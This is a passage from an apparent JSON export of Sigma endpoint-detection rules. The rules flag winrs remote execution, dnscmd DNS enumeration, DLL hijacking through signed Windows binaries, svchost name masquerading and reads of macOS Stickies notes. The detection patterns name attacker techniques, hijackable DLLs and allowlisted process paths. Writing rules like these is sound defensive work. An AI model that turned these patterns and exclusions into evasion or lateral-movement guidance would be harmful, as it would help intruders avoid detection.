classification.Windows.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'winrs.exe'\n - Image|endswith: '\\winrs.exe'\n\n selection_commandline:\n CommandLine|contains:\n - ' /remote:'\n - ' -remote:'\n - ' /r:'\n - ' -r:'\n\n # This is handled by the rule 734b213f-25e3-402d-862b-ccbe5a1166f4\n exclusion_local:\n CommandLine|contains:\n - '127.0.0.1'\n - 'localhost'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6b9469d-5088-46a6-a7f4-26d176eb8bde",
"rule_name": "Execution on Remote Host via Winrs",
"rule_description": "Detects the execution of Winrs.exe to possibly execute malicious binaries on a remote host.\nThis binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Winrs process.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6bfc159-5271-4835-a319-0f1d4cea23c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083606Z",
"creation_date": "2026-03-23T11:45:34.083608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083612Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_dnscmd_discovery.yml",
"content": "title: DNS Records Discovered via dnscmd.exe\nid: e6bfc159-5271-4835-a319-0f1d4cea23c7\ndescription: |\n Detects the usage of dnscmd.exe to enumerate domain DNS entries.\n Attackers may leverage dnscmd.exe to gather information about DNS entries of a domain and thus identify new potential targets.\n It is recommended to investigate actions made by the parent process to identify other potentially malicious commands and to correlate this alert with other discovery actions.\nreferences:\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\n - https://attack.mitre.org/techniques/T1018/\ndate: 2023/12/27\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'dnscmd.exe'\n CommandLine|contains:\n - ' ?enumrecords'\n - ' ?enumzones'\n - ' ?ZonePrint'\n - ' ?info'\n filter_bestpractice:\n ParentImage:\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n CurrentDirectory: '?:\\Windows\\System32\\BestPractices\\v1.0\\Models\\Microsoft\\Windows\\DNSServer\\'\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6bfc159-5271-4835-a319-0f1d4cea23c7",
"rule_name": "DNS Records Discovered via dnscmd.exe",
"rule_description": "Detects the usage of dnscmd.exe to enumerate domain DNS entries.\nAttackers may leverage dnscmd.exe to gather information about DNS entries of a domain and thus identify new potential targets.\nIt is recommended to investigate actions made by the parent process to identify other potentially malicious commands and to correlate this alert with other discovery actions.\n",
"rule_creation_date": "2023-12-27",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6dc15a6-39f5-4581-ad25-f3bb74d6d2cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083898Z",
"creation_date": "2026-03-23T11:45:34.083900Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083904Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ktmutil.yml",
"content": "title: DLL Hijacking via ktmutil.exe\nid: e6dc15a6-39f5-4581-ad25-f3bb74d6d2cf\ndescription: |\n Detects potential Windows DLL Hijacking via ktmutil.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ktmutil.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ktmw32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6dc15a6-39f5-4581-ad25-f3bb74d6d2cf",
"rule_name": "DLL Hijacking via ktmutil.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ktmutil.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6ee37ea-dabe-45dc-a61c-150a5c09ecf8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092751Z",
"creation_date": "2026-03-23T11:45:34.092753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092757Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dmclient.yml",
"content": "title: DLL Hijacking via dmclient.exe\nid: e6ee37ea-dabe-45dc-a61c-150a5c09ecf8\ndescription: |\n Detects potential Windows DLL Hijacking via dmclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCfgUtils.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmenterprisediagnostics.dll'\n - '\\dmiso8601utils.dll'\n - '\\DMOleAutUtils.dll'\n - '\\dmxmlhelputils.dll'\n - '\\IPHLPAPI.DLL'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6ee37ea-dabe-45dc-a61c-150a5c09ecf8",
"rule_name": "DLL Hijacking via dmclient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e732dcfa-139d-4903-840c-b11bb78094be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594566Z",
"creation_date": "2026-03-23T11:45:34.594569Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594577Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_applytrustoffline.yml",
"content": "title: DLL Hijacking via applytrustoffline.exe\nid: e732dcfa-139d-4903-840c-b11bb78094be\ndescription: |\n Detects potential Windows DLL Hijacking via applytrustoffline.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'applytrustoffline.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\mintdh.dll'\n - '\\StateRepository.Core.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e732dcfa-139d-4903-840c-b11bb78094be",
"rule_name": "DLL Hijacking via applytrustoffline.exe",
"rule_description": "Detects potential Windows DLL Hijacking via applytrustoffline.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e7ed7279-d5a1-4748-9cc6-1d86495d6221",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070587Z",
"creation_date": "2026-03-23T11:45:34.070589Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070594Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/",
"https://redcanary.com/blog/threat-detection/process-masquerading/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_svchost_masquerading.yml",
"content": "title: Binary Masquerading as svchost.exe\nid: e7ed7279-d5a1-4748-9cc6-1d86495d6221\ndescription: |\n Detects an executed process whose name is similar to svchost.exe.\n Adversaries may approximate the name of svchost binary in order to evade detection and analysis.\n It is recommended to check the legitimacy of the process by analyzing its behavior and correlating with other alerts on the endpoint.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/09/26/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/\n - https://redcanary.com/blog/threat-detection/process-masquerading/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/10/02\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessName:\n - 'svhost.exe'\n - 'scvhost.exe'\n - 'svchosst.exe'\n - 'svehost.exe'\n - 'svchast.exe'\n - 'svchos.exe'\n - 'schost.exe'\n - 'svchostt.exe'\n - 'svvhost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e7ed7279-d5a1-4748-9cc6-1d86495d6221",
"rule_name": "Binary Masquerading as svchost.exe",
"rule_description": "Detects an executed process whose name is similar to svchost.exe.\nAdversaries may approximate the name of svchost binary in order to evade detection and analysis.\nIt is recommended to check the legitimacy of the process by analyzing its behavior and correlating with other alerts on the endpoint.\n",
"rule_creation_date": "2024-10-02",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e7f19118-d344-433f-ab0a-2ba59a7576aa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618601Z",
"creation_date": "2026-03-23T11:45:34.618603Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618607Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_stickies.yml",
"content": "title: Suspicious Read Access to Stickies Files\nid: e7f19118-d344-433f-ab0a-2ba59a7576aa\ndescription: |\n Detects a process reading sensitive files related to the Stickies application.\n Adversaries may target user sticky notes on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Collection\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/Library/Containers/com.apple.Stickies/Data/Library/Stickies/'\n ProcessImage|contains: '?'\n\n filter_stickies:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.Stickies'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: 
'/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_security_tools:\n Image:\n - '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n - '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n - '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n - '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n - '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n - '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n - 
'/Library/Application Support/PaloAltoNetworks/Traps/bin/pmd'\n\n ### backup software ###\n exclusion_backup:\n Image:\n - '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n - '/Library/Oxibox/oxibackupd'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_checkpoint:\n ProcessSigned: 'true'\n ProcessSignatureSigningId:\n - 'cpard'\n - 'com.checkpoint.am.app'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e7f19118-d344-433f-ab0a-2ba59a7576aa",
"rule_name": "Suspicious Read Access to Stickies Files",
"rule_description": "Detects a process reading sensitive files related to the Stickies application.\nAdversaries may target user sticky notes on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e810a8d7-5996-42a2-9fb8-44861142fdb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595232Z",
"creation_date": "2026-03-23T11:45:34.595235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595243Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesdataexecutionprevention.yml",
"content": "title: DLL Hijacking via systempropertiesdataexecutionprevention.exe\nid: e810a8d7-5996-42a2-9fb8-44861142fdb2\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesdataexecutionprevention.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesdataexecutionprevention.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n 